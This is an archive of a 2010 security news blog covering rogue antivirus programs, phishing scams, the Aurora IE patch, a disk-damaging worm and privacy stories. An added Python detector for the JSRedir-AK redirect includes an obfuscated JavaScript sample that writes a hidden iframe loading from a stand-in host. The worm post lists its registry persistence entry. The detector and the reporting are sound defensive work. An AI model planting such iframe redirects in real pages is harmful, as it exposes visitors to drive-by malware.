Wednesday, January 27, 2010

New Rogue: LiveEnterpriseSuite

LiveEnterpriseSuite is a clone of InternetAntivirusPRO. Actually, the only thing that the authors of this rogue have changed is the name in the GUI.



LiveEnterpriseSuite will detect false infections and require a license to remove them.

If your computer is infected with this malware, you should remove it soon. Click here to learn how to remove such malware.

Google Media Player under development

Google has confirmed that its future operating system, Chrome OS, will have an integrated media player offering basic codec support, so that users can directly play audio or video files from Gmail, from USB drives or from other media devices.

In an interview with Ars Technica, Matthew Papakipos, the lead engineering director for the Chrome OS project, shared that Chrome OS will have a complete media player that approximates the functionality of Windows Media Player.
Another big aspect to what we’re doing is we’re integrating a whole media player into Chrome and into Chrome OS. People often get confused about this, and it’s a fairly subtle but important point. Because in a sense what we’re doing is integrating the equivalent of Windows Media Player into Chrome itself.

So it seems that Chrome OS is heading in the right direction: even though Chrome OS is built around the web, not every user will always be connected to the internet, so users also need to be able to play videos, MP3s, PDFs and other files when they're offline.

Google Chrome 4 – now with Extensions, Take Care!!!

With the latest release of their browser, v4.0, Google has shipped a long-awaited feature: browser extensions. Chrome now offers what other browsers such as Firefox, IE and Opera have offered for a long time.

But being better able to compete with the others doesn't mean that they have solved all problems. Actually, their problems are only starting to appear, because adding extensions to the browser is the same as opening Pandora's box.




Anyone can write extensions and upload them to the Google Extension Gallery. Google doesn't check in any way that the extensions behave correctly and do only "good" things.

As Aaron Boodman, Software Engineer at Google, posted in Chromium’s blog, extensions can bite: “If you’re using extensions now, you should keep in mind that they are powerful software. Extensions integrate with your browser, so they can access and change everything that happens in it. For example, the same technology that enables an extension to periodically check the number of messages in your Gmail inbox could also be used to read all your personal mail and tweet it to your mom! This can happen because of malicious intent or simply because of a bug.”

We strongly recommend being very careful about what you install in the browser. It is better to install only extensions built by Google. This is usually indicated in the extension name or description, and by the author's email address being @google.com (not gmail.com!). Also, make sure that the extension is rated highly (it should have at minimum 4 stars and have been reviewed by at least 1000 users).

These extensions can not only do bad things to you (as Aaron mentioned), but they can also affect the stability of the browser, deactivate other extensions or slow down browsing. So, even if they are not built to be malicious, they can be badly programmed and produce unintended actions that are just as harmful.

Loose Tweets Sink Fleets


Information leakage is a real problem.

It's especially bad for high-security organizations, like military agencies.

And it's now harder than ever to prevent, thanks to services such as Flickr, Photobucket, Facebook, Twitter and Myspace.

So we worked together with Lewis Communications to submit a Freedom of Information Act request to the UK Ministry of Defence, asking whether they've had problems with this.

After waiting some weeks, we got a reply back, detailing that UK military personnel and Ministry of Defence staff have leaked secret information 16 times on social networking websites and Internet forums.

People might think they are confiding in friends or family when they go on Facebook, for example, but in fact they might be making information available to everybody. Such mistakes can happen especially now that Facebook has been modifying their privacy settings.

Here's Sky News' take on this.




"Loose Tweets Sink Fleets" Poster image credit: Brian Lane Winfield Moore

Local Trends comes to Twitter

The most popular micro-blogging network, Twitter, has now added local trends support. This new feature allows users to track trending topics on Twitter related to their region. Currently, though, only a small number of countries and cities have been added.




In Twitter's words:


Local Trends will allow you to learn more about the nuances in our world and discover even more relevant topics that might matter to you. We’ll be improving this feature over time to provide more locations, languages, and data through our API.



Don't forget to follow me @boelectronic on Twitter.

MS Office 2010 RTM Final Build 14.0.4734.1000 Escrow Release

Microsoft is about to start assembling the final (RTM) build of Office 2010, also known as Office 14. According to news leaked on Wzor, development of the Office 2010 package has reached its last stage. The build is codenamed Escrow and carries build number 14.0.4734.1000.

According to Wzor, this RTM Escrow build 14.0.4734.1000 has already been circulated within the corporation and is available to company employees and partners. A few days earlier, when build 14.0.4730.1007 leaked on torrent networks, its EULA (license agreement) stated that it was an RTM version, but apparently it was just a pre-RTM build. Testers are still working on it and, if there are no problems, it will move to RTM.

Here is a list of previously compiled builds:
14.0.4734.1000 RTM Escrow
14.0.4730.1007 pre-RTM Escrow
14.0.4730.1006
14.0.4709.1000
14.0.4702.1000
14.0.4615.1000
14.0.4605.1000
14.0.4536.1000
14.0.4517.1000
14.0.4514.1009 BETA-2
14.0.4514.1004
14.0.4514.1003
14.0.4417.1000 BETA-1
14.0.4302.1000 BETA-1
14.0.4006.1110
14.0.4006.1010 TECHNICAL PREVIEW
14.0.3524.1003

Microsoft has said that Office 2010 RTM packages will be available from June 2010, but Wzor, on the contrary, claims it will launch in April 2010. Let's see how much truth lies behind these statements.

Tuesday, January 26, 2010

Troj/JSRedir-AK: 40% of a month’s malware

It has been a month since Sophos added detection for Troj/JSRedir-AK and figures generated today show that over 40% of all web-based detections have been from this malicious code.




[Graph shows Malware hosted on websites from 2009-12-22 11:00:00 to 2010-01-21 11:00:00 (GMT-8)]

Translating the numbers into a more human-readable form: one site every 15 seconds was being detected as Troj/JSRedir-AK.

The affected sites include well-known names in sectors such as:


  • Energy Companies
  • Retail Companies
  • Automobile Club
  • Hotels

Using JavaScript's .replace() method, the malware deobfuscates itself and dynamically writes an iframe pointing to a Russian website on port 8080, which serves up scripts detected as Troj/Iframe-DL.

This new script writes an iframe that attempts to load a PDF (detected as Troj/PDFJs-FY) and a file claiming to be a JPG (detected as Exp/VidCtl-A). These then install various other malware.
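As an added example (not from the Sophos post, and not Sophos's detection logic), the following Python heuristic checks a script for the traits described above: a String.replace()-based deobfuscation step, a document.write of an iframe, a target on port 8080 and a hidden frame. It statically folds the simplest "literal".replace(/junk/g, "") idiom so that the rebuilt markup can be inspected as well as the raw source. The sample scripts and the host name example-bad-host.invalid are constructed for this example.

```python
"""Heuristic detector for the Troj/JSRedir-AK traits described in the post.

Each indicator is searched in the raw script and in the statically
"deobfuscated" script; a trait scores once however often it appears.
The samples at the bottom are constructed, not captured malware.
"""
import re

# (name, pattern, weight)
INDICATORS = [
    ("replace_deobfuscation",
     re.compile(r"\.replace\s*\(\s*/[^/]+/[gimsuy]*\s*,", re.S), 2),
    ("document_write", re.compile(r"document\.write(?:ln)?\s*\(", re.I), 1),
    ("iframe_tag", re.compile(r"<\s*iframe", re.I), 2),
    ("port_8080", re.compile(r"https?://[^\s\"']+:8080\b", re.I), 3),
    ("hidden_frame",
     re.compile(r"(?:width|height)\s*=\s*[\"']?0(?!\d)"
                r"|visibility\s*:\s*hidden|display\s*:\s*none", re.I), 1),
]
SUSPICIOUS_THRESHOLD = 6

# Matches  "literal".replace(/pattern/flags, "replacement")  with either quote style.
REPLACE_CALL = re.compile(
    r"""(["'])(?P<body>(?:\\.|(?!\1).)*)\1\s*\.replace\s*\(\s*"""
    r"""/(?P<pat>(?:\\.|[^/])+)/(?P<flags>[gimsuy]*)\s*,\s*"""
    r"""(["'])(?P<repl>(?:\\.|(?!\5).)*)\5\s*\)""",
    re.S,
)


def emulate_replace(script: str) -> str:
    """Fold the simplest String.replace() deobfuscation idiom into the literal it yields.

    Chained calls are folded by iterating to a fixpoint. JavaScript and Python
    regex syntax agree for the plain characters and character classes this idiom
    uses; a pattern Python cannot compile is left untouched. Calls whose first
    argument is a string rather than a regex are not handled.
    """
    def fold(m: re.Match) -> str:
        body = m.group("body").replace('\\"', '"').replace("\\'", "'")
        count = 0 if "g" in m.group("flags") else 1  # /g means replace all
        try:
            decoded = re.sub(m.group("pat"), m.group("repl"), body, count=count)
        except re.error:
            return m.group(0)
        return '"' + decoded.replace('"', '\\"') + '"'

    prev = None
    while prev != script:
        prev, script = script, REPLACE_CALL.sub(fold, script)
    return script


def scan(script: str) -> dict:
    """Score a script; returns the score, the indicator names hit and the decoded text."""
    decoded = emulate_replace(script)
    hits = {}
    for name, rx, weight in INDICATORS:
        if rx.search(script) or rx.search(decoded):
            hits[name] = weight
    return {"score": sum(hits.values()), "hits": sorted(hits), "decoded": decoded}


def is_jsredir_like(script: str) -> bool:
    return scan(script)["score"] >= SUSPICIOUS_THRESHOLD


# Constructed samples. The first hides the markup with a junk character that
# .replace() strips at run time, so a raw grep for "<iframe" or ":8080" misses it.
SAMPLE_MALICIOUS = (
    "var z='<if%rame s%rc=\"http://example-bad-host.invalid:80%80/in.php\" "
    "w%idth=0 he%ight=0></if%rame>'.replace(/%/g,'');"
    "document.write(z);"
)
SAMPLE_BENIGN_REPLACE = (
    'var t = "Hello, World".replace(/o/g, "0");\n'
    'document.getElementById("x").textContent = t;'
)
SAMPLE_BENIGN_IFRAME = (
    "document.write('<iframe src=\"https://www.example.com/widget\" "
    "width=300 height=200></iframe>');"
)

if __name__ == "__main__":
    for label, sample in [("malicious", SAMPLE_MALICIOUS),
                          ("benign replace", SAMPLE_BENIGN_REPLACE),
                          ("benign iframe", SAMPLE_BENIGN_IFRAME)]:
        result = scan(sample)
        print(f"{label:15} score={result['score']:2} hits={result['hits']}")
```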

Troj/JSRedir-AK is a continuation of the Gumblar gang's exploits, using Russian domains instead of Chinese ones. In fact, the graph above is very similar to the one we saw for Troj/JSRedir-R, and the infection mechanism seems to be the same (i.e. FTP credentials).

New Rogue: APcSafe

APcSafe is another rogue anti-spyware clone of the WiniGuard family.



If your computer is infected with this malware, you should remove it soon.

New Rogue: PcsSecure

PcsSecure is the latest cloned rogue antispyware from the WiniGuard family.



If your computer is infected with this malware, you should remove it soon.

Google Chrome Stable Channel Update

The stable channel has been updated to 4.0.249.78 for Windows, and includes the following features and security fixes (since 3.0):

  • Extensions
  • Bookmark sync
  • Enhanced developer tools
  • HTML5: Notifications, Web Database, Local Storage, WebSockets, Ruby support
  • v8 performance improvements
  • Skia performance improvements
  • Full ACID3 pass, due to re-enabled remote font support (with added defense against bugs in operating system font libraries)
  • HTTP byte range support
  • New security feature: "Strict Transport Security" support
  • Experimental new anti-reflected-XSS feature called "XSS Auditor"

Security Fixes:

Please see the Chromium security page for more detail. Note that the referenced bugs may be kept private until a majority of our users are up to date with the fix.

  • [3275] Low Pop-up blocker bypass. Credit to Google Chrome Security Team (SkyLined).
  • [9877] Medium Cross-domain theft due to CSS design error. Credit to Chris Evans of the Google Security Team.
  • [12523] Medium Browser memory error with stale pop-up block menu. Credit to Jacob Balle and Carsten Eiram, Secunia Research.
  • [20450] Low Prevent XHR to directories. Credit to the Chromium development community.
  • [23693] Low Escape more characters in shortcuts. Credit to Michal Zalewski of the Google Security Team and, independently, Inferno of SecureThoughts.com.
  • [8864] [24701] [24646] High Renderer memory errors drawing on canvases. Credit to Michal Zalewski of the Google Security Team and Google Chrome Security Team (SkyLined).
  • [28566] High Image decoding memory error. Credit to Robert Swiecki of the Google Security Team.
  • [29920] Low Corner case failure to strip Referer. Credit to the Chromium development community.
  • [30666] High Cross-domain access error. Credit to Tokuji Akamine, Senior Consultant at Symantec Consulting Services.
  • [31307] High Bitmap deserialization error. Credit to Mark Dowd, under contract to Google Chrome Security Team.
  • [31517] Low Browser crash with nested URL.

Google Toolbar tracks searches after it’s disabled.

Ben Edelman, Harvard privacy researcher and guru, has revisited the features of Google Toolbar and was appalled to discover that disabling it doesn't really disable it. He is recommending that all users uninstall it.

In a long, thorough and well-written piece on his blog Edelman discusses how he monitored the Toolbar’s behavior with a network sniffer and documented the transmission of data back to Google (to toolbarqueries.google.com). Not only does it track a user’s Google searches, but it also phones home information about searches done in other search engines.

And, the privacy policy, he says, is “inept.”

“Notice that the Privacy Policy loads in an unusual window with no browser chrome – no Edit-Find option to let a user search for words of particular interest, no Edit-Select All and Edit-Copy option to let a user copy text to another program for further review, no Save or Print options to let a user preserve the file. Had Google used a standard browser window, all these features would have been available, but by designing this nonstandard window, Google creates all these limitations.”

This, of course, prevents a user from using an application like EULAlyzer that points out areas of concern in end user licensing agreements and privacy statements.

His conclusions about what Google should do:

“When a user disables Google Toolbar, all Enhanced Features transmissions need to stop, immediately and without exception. This change must be deployed to all Google Toolbar users straightaway....”


“Google also needs to clean up the results of its nonconsensual data collection. In particular, Google has collected browsing data from users who specifically declined to allow such data to be collected....” 


“But these records never should have been sent to Google in the first place. So Google should find a way to let concerned users request that Google fully and irreversibly delete their entire Toolbar histories.


“The current Toolbar installation sequence suffers inconsistent statements of privacy consequences, with poor presentation of the full Toolbar Privacy Statement. Toolbar puts a button on users’ Taskbar unrequested. And as my videos show, once Google puts its code on a user’s computer, there’s nothing to stop Google from tracking users even after users specifically decline. I’ve run Google Toolbar for nearly a decade, but this week I uninstalled Google Toolbar from all my PCs. I encourage others to do the same.”

Virus Writers Produce Hardware Damaging Code with Win32.Worm.Zimuse

Disguised IQ test combines virus, rootkit and worm -- malicious code for one fatal formula

BitDefender today identified a new e-threat that combines the destructive behavior of a virus with the spreading mechanisms of a worm. There are two known variants of this virus, which enters the computer disguised as a harmless IQ test.

Once executed, the worm creates between seven and eleven copies of itself (depending on the variant) in critical areas of the Windows system.

Win32.Worm.Zimuse.A is an extremely dangerous piece of malware. Unlike average worms, Win32.Worm.Zimuse.A could lead to severe data loss as it overwrites the first 50 KB of the Master Boot Record - a key zone of the hard disk drive.

In order to execute on each Windows boot-up, the worm sets the following registry entry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Dump"="%programfiles%\Dump\Dump.exe"

It also creates two driver files, namely:

%system%\drivers\Mstart.sys and %system%\drivers\Mseu.sys

Since 64-bit versions of Windows Vista and Windows 7 require digitally signed drivers, the worm would fail to install these files.

Unfortunately, in its early stages, this worm makes it nearly impossible for users to know their system has fallen victim to the e-threat. If a certain number of days have elapsed since the infection (40 days for variant A and 20 days for variant B), the computer user receives an error message stating that a problem has occurred due to malicious content in IP packets from a peculiar-looking web address. It then asks the user to recover the system by pressing “OK.” After this message, the next restart causes the computer’s hard disk to become damaged due to the compromised boot sector. To view a video detailing what occurs during an attack by Win32.Worm.Zimuse.A, please click here.

To stay safe, download and install antivirus, antispyware and firewall software and keep them updated at all times. Users should also employ extra caution when prompted to open files from unfamiliar locations.

Monday, January 25, 2010

Desktop Security 2010

Desktop Security 2010 is a rogue antispyware program, designed to trick people into thinking it is a legitimate program. Desktop Security 2010 uses fake security warnings and system scans to frighten people into buying the software. If Desktop Security 2010 is installed on your PC, you should remove it immediately as it is a potentially dangerous computer infection.




Computers that have been infected with Desktop Security 2010 may show the following symptoms:

  • System scans that report numerous infections, yet require the purchase of System Defender before they will remove the infections (these are fictitious scan results)
  • Alerts and pop-up system warnings stating the PC is infected and recommending the purchase of System Defender (these warnings are fake)
  • Web browser redirecting to random websites (these websites are owned by cyber thieves and will further infect your PC)
  • System Defender will prevent other programs from opening, stating they are infected (the programs are not infected)

If Desktop Security 2010 has infected your computer, you must remove it soon.

Hotmail password phishing again

I am a very lucky guy.

In fact, I must be the luckiest person in the world since spammers like to send all kinds of lucky spam to me.

These days, I get inundated with lucky spam. The last spam I had, I got offered a free gift card if I purchased some Viagra from them. Wow.

On other days, asking me to lose my weight results in instant chances of winning a lottery at the same time and all of this is due to my lucky email address.

But before I can get my lucky email address, they first need to verify my hotmail account.



Not a problem, right?




Not so fast, Speedy Gonzales. A quick observation by moving my mouse over the displayed link shows that the real link is in fact different from that which is being shown.

Although the login page looks the same as a Windows Live page, I don’t think Microsoft is that broke to host its website under another user’s /albums/userpics/ hotmail-au/ web address folder.

Obviously, this is a password phishing spam that specifically targets Hotmail, which is similar to the Hotmail Password Scam Continuing phishing campaign we reported a while back.

So, I strongly advise customers to be careful of this kind of phishing email when clicking links in emails and using web-based email services.

Remember, you may still not be as lucky as me, but at least you won’t get your Hotmail account compromised.

Good Luck :)

Adobe Flash 10.1 Will Get Private Browsing Mode

Adobe Flash is a well-known plugin used today by most internet users. Its next upgrade, version 10.1, will get private browsing support. Flash Player will automatically clear all Flash history on your computer once you end the session, using the same technique as browsers that support private browsing.




Just as a browser in private mode automatically clears cookies, history and data when you end the session, Flash will also remove any user passwords, login information or other data stored while working in the Flash environment.

While in private mode, even Flash games and applications will not be able to access your browser data and history. You can access your microphone and camera as normal, but you cannot increase your storage limit while in private mode. Presently, only browsers that support private browsing will be able to integrate with this new feature.


Supported Browsers

Browsers currently supported by the new Adobe version are:

  • Mozilla Firefox 3.5 and above.
  • Internet Explorer 8.0 and above.
  • Google Chrome 1.0 and above.

Adobe has also announced support for future versions of Safari.

This new Adobe feature will help you keep your privacy more tightly secured. There is a developer pre-release; the complete version may be released in the first half of this year.

For more information visit: Adobe Labs

Saturday, January 23, 2010

Nude Pictures of Senator Scott Brown Arouse New Virus Concerns

False images from Cosmopolitan infect computers with fake antivirus product


BitDefender today warned of a new threat following the flood of interest in the result of the January 19th Massachusetts elections.

The day after his winning Senate campaign, nude pictures of Cosmopolitan’s Sexiest Man of 1982 Scott Brown not only stirred women’s imaginations, but also got the interest of malware creators. The latter exploited the news to spread a fake antivirus: Trojan.FakeAV.XP. Instead of spicy pictures, the targeted user received messages of false infections on their computer and prompts to buy a fake antivirus product.

This is the second attack to take advantage of sudden interest in Scott Brown. The first was a massive wave of infections in the US due to Trojan.FakeAV.ABT. Data provided by BitDefender's Real-Time Virus Reporting System shows that in North America, the number of systems infected with this Trojan increased by almost 8 percent just before election day (January 18th), while the number of infected files rose by nearly 13 percent.

In the last two days, the number of infected systems also grew in locations around the globe. In Canada, they increased by 62 percent on January 19th and by 14 percent on January 20th. The same ascending trend for infections was observed in the UK. The number of infected systems there grew by more than 29 percent, while the number of the infected files grew by almost 53 percent. In France, the number of infected systems increased by 23 percent, while the number of the infected files increased by about 32 percent. In Romania, the numbers also climbed, with infected systems rising by more than 11 percent.

The rogue antivirus resembles the program suite from the operating system. Once on the user’s system, it creates a start-up registry value, "Enterprise Suite", in order to run every time the operating system starts. It damages the content of several system files, delivering pop-up windows with fake infections, while requiring the user to buy a license for it.

To protect and avoid compromising systems and data:

1. First and foremost, have legitimate antivirus software installed

2. Install and activate a reliable antimalware, firewall solution and spam filter

3. Do not download software that claims to be free or anything else unless you completely trust the source

4. Don’t get fooled by fake video players that require “codecs” and Web scanners that pretend to disinfect your computer

5. Always scan your downloads before launching them

Friday, January 22, 2010

404 error message spoof

Some questionable sites associated with the WiniGuard family of rogue security products pull it from this location, which appears to belong to a graphic designer in Canada.

It’s funny, and there’s waaaay too much truth in it:




Smutty Searches Scuppered

Symantec Security Response has repeatedly warned that looking for free movies and videos online often results in malware infection, and here we go again with yet another example. We recently became aware of a campaign, centered around the YouTube Web site, to trick users into following malicious links.

YouTube is one of the most popular video sharing sites and therefore is often picked by online criminals hoping for an easy catch. Performing a search using a (generally female) celebrity’s name followed by "sex tape" or a recent movie name yields results such as the following:





Unfortunately, clicking the links highlighted in red in the above screenshots will not lead to the desired footage of Ms. Hudgens or the movie Angels and Demons. In place of what would have been the video is a message from the poster stating that they cannot upload the video because it would be deleted by YouTube, it is too big to host on YouTube, or other such excuses. However, the poster kindly places a bit.ly link on the page and claims that the full video is only a single click away:




There is some variation in the bit.ly links but they all point to a single malicious Web site that attempts to hoist malware onto the user’s computer. Youtube.com is aware of such attacks and is constantly battling to ensure that the videos and accounts being used are quickly taken offline. But with 20 hours of video being uploaded to Youtube.com every minute this is no easy task and some may slip through the cracks. This attack is well orchestrated, with numerous new videos with different search terms being uploaded on a daily basis to replace accounts and videos being taken offline.

For users of Symantec products with IPS capabilities, this is as far as the attempted attack goes. The IPS signature HTTP Misleading Application Download Request blocks access to the malicious site and the threat never hits the computer.

Those who do not have IPS-enabled products will be asked to download and execute a file in order to watch the video:



Symantec products currently detect the downloaded file as Trojan.FakeAV, although further analysis of the file is underway. As ever, we urge users to keep their virus definitions up-to-date to stay abreast of these attacks.

iPhish - fake iPhone warranty steals info

This week we’ve seen a spam campaign aimed at separating unsuspecting users from their iPhone details.

Messages have the subject “IMPORTANT: Your iPhone Warranty Extension for 1 Year!”, pretend to be sent from “iphonewarranty@apple.com”, and look as follows (click to enlarge the image):



Recipients who feel like they can’t let this limited-time too-good-to-be-true special offer pass them by will find themselves redirected to the following page:




All you have to do is enter your phone’s serial number and IMEI number, as well as its type and capacity, and you’ll be all set. Don’t know how to get any of these numbers? Not to worry, there’s a link to help you find them … which has the cheek to point to a real Apple support page. In fact all the links on this page point you to the real Apple website - this is partly to allay suspicion, but also simply because it’s easier for the authors to copy an area of the real site than to be selective or creative.

Entering your credentials (no, I didn’t give them any real ones) takes you to this page:




Interestingly they don’t ask for some fairly basic information here - at no point do they want either your name or your phone number. There’s still a range of nefarious activities they could get up to though - one that springs to mind is that IMEI numbers are used by network providers to block connections from phones registered as stolen, so by harvesting details from live phones criminals might be able to launder stolen phones.

Whatever they plan to do with your iPhone details, it’s not going to be good. You’re enticed in with a warranty, but the only thing you’re going to get is ripped off.

Now you too can mount your own Operation Aurora Attacks!!!

But don’t.  Please don’t!…      just….       don’t!…

Instead, why don’t you apply the out-of-band patch ( MS10-002 ) that Microsoft has just released…?!!!

Patching remote-code-execution vulnerabilities is usually “a good idea” to say the least.  But, considering that:

Microsoft rushed to get this patch out…… ( Thank you Microsoft! )

And that this patch addresses several Internet Explorer vulnerabilities, including CVE-2010-0249, the infamous “Aurora attacks” vulnerability that is well known to be making the rounds in the wild.

Annnnd that, the Metasploit framework has released an update that can generate attacks based on this….. Which means that every script-kiddy / pentester / disgruntled-monkey-with-a-laptop can mount their own little mini operation Aurora-like attacks.




Annnnnnd that, Microsoft has posted an advisory about an unpatched elevation of privilege attack that affects most Windows NT platforms ( from Windows NT 3.1 to, and including, Windows 7 ) - which there is proof-of-concept code now publicly available for…..

Just Update your windows using Microsoft Update!

Salesmen Are Not My Friends

I dislike salesmen. The look on their faces irks me when I can feel the dollars flicking in their eyes. I hate it when my car insurance company asks if I want to get home insurance as well. I do not like it when my credit card company tries to sell me a great new insurance product. In general, I hate to be a victim of cross selling.

Malware authors are just like salesmen. They cross-sell as well. A fake AV tried to do the same to me. Besides offering great AV protection, it wants me to get some useful codecs so that I can watch all my legit DVDrips. Thus, someone decided that in order to get me to install their codecs, he/she will have to terminate all processes related to media players.




Terminating Media Players

In addition to the above, the malware also terminates different kinds of common applications because I need to update my AntiVirus to get them to work.




Update My AV Please

Eventually, I ended up with a useless machine that will not play my movies nor launch common applications. Cross selling is bad for computer users! Using Whois, I have confirmed that one Russian salesman named ‘Alexey’ has been behind all this.

APcSecure

APcSecure is a new rogue from the WiniGuard clone factory.


Dirty jokes by mobile phone

The Danwei web site (Chinese media, advertising, and urban life) is carrying a rippingly funny blog piece by Alice Xin Liu about a recent Chinese government program that would have China Mobile monitor mobile telephone text transmissions for conversations of a sexual nature. Offenders’ (messaging) service would be cut off until they wrote a “self-criticism.”

Xin Liu said bloggers in China are having a ball with the idea that the government is trying to censor dirty jokes, which apparently are a significant part of the culture of Chinese people (as if they were any different from the rest of us).

The Chinese language, however, is structured in such a way that machine filtering encounters even more complexity than it does in other languages.

“Similar to filtering for the Internet, dirty phrases are targeted, but with the make up of Chinese sentences, two completely unrelated characters could be strung together to make something a lot ruder,” she says.

She said that one student blogged that after he returned from dinner at a friend’s home, he sent the text message to his buddy: “you mom’s stewed post [pork?] is excellent.” The next day he couldn’t send text messages.

There is a Chinese euphemism “meat stick,” but you can read Xin Liu’s original blog post for that discussion.

Dirty jokes are part of the fabric of life she concludes. “…sex is a kind of entertainment. Furthermore, it’s quite important as a form [of] entertainment.”

Thank you Alice.

Blog piece here.

New York Times story "China to Scan Text Messages to Spot ‘Unhealthy Content’" here.

UK telecom giant Virgin Media monitoring customers’ file sharing

Virgin Media, the UK telecommunications giant that supplies TV, phone and Internet services, has begun to use deep packet inspection to determine whether its Internet customers are sharing music or films.

The monitoring system will check transmitted data against a database of copyrighted music and video to spot illegal file sharing.

Virgin Media said the system isn’t keeping track of IP addresses of the transmissions and the technology isn’t designed to catch illegal downloaders, but it could.

Observers have said that the system could be used to implement UK government initiatives to fight Internet piracy by sending repeat offenders warning letters then cutting off their Internet.

Story here.

Thanks Donna’s Security Flash.

Report from Europe: 95 percent of email is spam

The European Network and Information Security Agency (ENISA) has released a report that says 95 percent of all email is now spam.

The report was based on surveying last year of email traffic by about 100 service providers in 30 countries.

ENISA Executive Director Dr. Udo Helmbrecht said:

“Spam remains an unnecessary, time consuming and costly burden for Europe. Given the number of spam messages observed, I can only conclude more dedicated efforts must be undertaken.


“Email providers should be better at monitoring spam and identifying the source. Policy-makers and regulatory authorities should clarify the conflicts between spam-filtering, privacy, and obligation to deliver.”

ENISA survey here.

System Defender

System Defender is a rogue antispyware program, or a PC infection made to look like real security software. System Defender is a scam designed to trick people out of their money.




If your PC has been infected with System Defender, you will most likely experience the following symptoms:

  • System scans that report numerous infections, yet require the purchase of System Defender before they will remove the infections (these are fictitious scan results)
  • Alerts and pop-up system warnings stating the PC is infected and recommending the purchase of System Defender (these warnings are fake)
  • Web browser redirecting to random websites (these websites are owned by cyber thieves and will further infect your PC)
  • System Defender will prevent other programs from opening, stating they are infected (the programs are not infected)

System Defender is a very serious computer infection and should be removed from infected machines immediately.

ProtectSoldier

ProtectSoldier is the latest rogue antispyware program released by cyber thieves to terrorize PC users.



ProtectSoldier is a phony security program that tricks people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that claim the PC has numerous infections, cyber thieves rip people off by demanding that the user buy the program to remove the supposed infections.

ArmorDefender

ArmorDefender is the latest rogue antispyware program released by cyber thieves to terrorize PC users.



ArmorDefender is a phony security program that tricks people into buying the software with false security warnings and system scans. By displaying false system warnings, pop-up alerts warning of infections, and system scans that claim the PC has numerous infections, cyber thieves rip people off by demanding that the user buy the program to remove the supposed infections.

Antivirus360

Antivirus360 is a phony antivirus program, designed to rip people off. Cyber thieves who created phony software like Antivirus360 use scare tactics to frighten people into buying the software.



Antivirus360 will show false security warnings and scan results stating that the PC is infected and request payment for the software to remove the supposed infections. Antivirus360 is a complete scam and a potentially very dangerous PC infection that should be removed from infected computers.

Charities fight for piece of $5 million prize on Facebook


(CNN) -- This week, 100 charities are battling for votes on Facebook to win $1 million.
The competition is a new approach to philanthropic giving and is led by JPMorgan Chase, which throughout the competition will donate a total of $5 million to 100 charities chosen by Facebook users.
Traditionally, organizations would go through a grant process, and Chase would choose who would get its money and how much. However, late last year, Chase decided to take a different approach and put the power of choosing charities into the hands of Americans.
Chase took a database filled with 500,000 nonprofit organizations and uploaded the information on to Facebook. The bank then allowed "crowdsourcing" to choose which charities should be recognized.
The top 100 charities won $25,000 and advanced to the second round, where another vote will determine which organization will win $1 million. The five runners-up in the second round will receive $100,000 each.
Another $1 million will be given to a single charity chosen from the original group by a Chase board of directors set up to oversee this competition.
The concept of crowdsourcing corporate giving via online communities and voting was first used by American Express in 2007. In the Members Project, American Express would donate $5 million to charities submitted and selected by card members.
But Chase has taken a huge leap by moving the entire competition to Facebook.
"We wanted to find a way where we could hear from the communities we were operating in and hear what was important to them," said Chase Community Giving foundation President Kim Davis.
The philanthropic arm of the large bank donates annually $100 million to organizations around the world, Davis said. "This, for us, is very much about testing out a new way of doing corporate philanthropy for the firm."
More than a million fans have participated in the Facebook program.
Along the way, obscure charities have joined better-known ones near the top of the rankings.
Because the winners of the first round worked hard to organize their online communities, smaller charities with get-out-the-vote passion were able to compete with larger organizations.
Thus, the final 100 charities range from the large Susan G. Komen for the Cure (which claims on its Web site to be the "world's largest grassroots network of breast cancer survivors and activists") to the Feel Your Boobies foundation, started by a woman in her garage, who wants to increase awareness of breast cancer screenings in young women.
As of midday Thursday, the top vote-getting charity on the contest's Facebook page was Invisible Children Inc., a nonprofit that seeks to combat child-related violence in Africa through documentary storytelling.
Other companies are starting to pick up on crowdsourcing corporate philanthropy.

Pepsi is donating $20 million in grants this year to applicants who submit "good ideas that move communities forward," said Bonin Bough, the global director of digital and social media for Pepsico.
If someone wants to build a park in their neighborhood, that is an idea that can be submitted. "Big or small, this is about the power of ideas and the individual," Bough said.
The voting will take place on a separate site that Pepsi created. But the beverage company is providing tools -- widgets to post on Facebook pages, Twitter accounts, Tumblr blogs and other social networks -- to make it easy for applicants to campaign for votes.
David Levy is the co-founder of Social Vibe, a 2-year-old company based in Los Angeles, California, that designs marketing campaigns around social good for companies such as Kraft Foods and Coffee-Mate.
"The new role of the [advertising] agency is to figure out for the brand what users want to share," he said.
Although Levy's work may be philanthropic, he is in the marketing business. Levy does not doubt that what Chase and Pepsi are doing is partly for public relations purposes. He said, "We all have to own up to the fact that brands are in the business of making money."
Pepsi's Bough is quick to point out the unprecedented amount of money being donated to support people's ideas.
"It is not just about headlines," he said. "It is about delivering impact."
Chase points to its long history in corporate philanthropy, which started in 1804.
The company said that if it was a public-relations effort, the competition would be done differently, with advertisements in newspapers and corporate PR representatives pitching reporters.
Publicity stunt or not, representatives for the charities said they have positive feelings towards Chase.
"I think it is an amazing contest," said Jared Paul, whose A Good Idea charity is now competing for the million-dollar final prize. He believes that the contest "is going to be a great example of how organizations can spend their money and serve communities in need."
A Good Idea is a volunteer organization that provides services to the homeless and underserved youth in San Francisco, California. Paul is hosting a voting party this week with drinks, food and computers so people can log onto Facebook and vote.

“Aurora” update brief DoS

Early this afternoon Microsoft released an out-of-band security bulletin patching the vulnerabilities in Internet Explorer. The fix has been at the top of the news since the vulnerabilities it treats are believed to have led to the compromise of Google and about 30 other companies last week in what has been called the “Aurora” attack. The governments of France and Germany suggested that Internet users switch to a different browser until the vulnerability was fixed.

So, I guess, in a way, this is good news:




It means that the word obviously is out that there’s a problem and there’s a fix.

According to Wikipedia, Microsoft’s IE browser (versions 6 through 8) has a 63 percent browser market share. Apparently, every one of them hit Microsoft’s site at the same time for the update.

Update:

Minutes later it worked:



Microsoft Security Bulletin MS10-002 Here.

Thursday, January 21, 2010

ProtectDefender

ProtectDefender is a new clone of the WiniGuard family.


Web users still don’t select good passwords

Security firm Imperva of Redwood Shores, Calif., found a unique way to gauge the quality of the passwords that Web users select: they analyzed the 32 million passwords in the unencrypted password file that miscreants stole from the servers of RockYou.com in December and posted on the Internet.

RockYou creates and distributes entertainment widgets that work with social networking sites.

What they found wasn’t good, according to their report.

“Key findings:
-- About 30% of users chose passwords whose length is equal to or below six characters.
